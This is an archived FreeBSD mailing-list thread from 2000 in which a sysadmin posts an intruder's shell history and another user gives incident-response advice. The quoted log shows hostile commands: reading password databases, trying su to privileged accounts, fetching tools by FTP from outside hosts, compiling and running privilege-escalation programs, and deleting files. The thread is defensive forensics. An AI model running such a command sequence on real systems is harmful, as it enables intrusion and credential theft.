Skip site navigation (1)Skip section navigation (2) 
Date:      Mon, 18 Dec 2000 15:31:02 -0500 (EST)
From:      Alexander V P <alex@big-blue.net>
To:        "Gerald T. Freymann" <freymann@eagle.ca>
Cc:        Questions <questions@FreeBSD.ORG>
Subject:   Re: Hacker history file - OUCH
Message-ID:  <Pine.BSF.4.05.10012181523480.23598-100000@borg.starbase.net>
In-Reply-To: <NEBBIPHLEDGOAFACJGDDAEBPDHAA.freymann@eagle.ca>
next in thread | previous in thread | raw e-mail | index | archive | help 
hi,
do you keep/have logs about what ftp transfers he did?
did you send mail to root@he.net, or .mx domain?
any idea how he break in? what freebsd you're using?
if i'm on your place, i'll unplug the box and try to find out more about
this. don't do like most of the sysadmins that just wipe the box.
alex

On Mon, 18 Dec 2000, Gerald T. Freymann wrote:

> 
> 
> Seems we have an intruder on one of our boxes... the .history file from the
> troubled account follows:
> 
> cd bnc
> ls
> ./bash
> who
> cd /etc
> more passwd
> ps -l
> ls -l
> more pwd.db
> more hosts
> pico adduser.conf.bak
> pico group
> su user
> pico group.bak
> pico ftpuser
> O
> pico ftpusers
> su toor
> su operator
> id
> pico spwd.db
> su wheel
> pico passwd
> cd /var/tmp
> ls -a
> cd ...
> ls -a
> cd ..
> ls -l
> ls -al
> cd ...
> ftp copper.he.net
> chmod u+x xcon
> ./xcon
> id
> rm *
> ls
> who
> cd /var/tmp
> ls -a
> ls -al
> cd ...
> ls -a
> ftp cih.edu.mx
> ls
> cc bsd1 bsd-cron.c
> cc -o bsd1 bsd-cron.c
> ./bsd1
> id
> cc -o bsd2 bsd2.c
> ./bsd2
> id
> ls
> ftp cih.edu.mx
> ./bsd sh
> ./bsd.sh
> chmod u+x bsd.sh
> ./bsd.sh
> /tmp/sh
> id
> ls
> cc -o bsdsmail bsdsmail.c
> ./bsdsmail
> ls -a
> pico hack
> ls
> pico user.inf
> ls
> id
> rm *
> exit
> 
>  Anybody recognize what the intruder has set up?
> 
> -Gerry
> 
> 
> 
> 
> 
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-questions" in the body of the message
> 



To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-questions" in the body of the message

Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?Pine.BSF.4.05.10012181523480.23598-100000>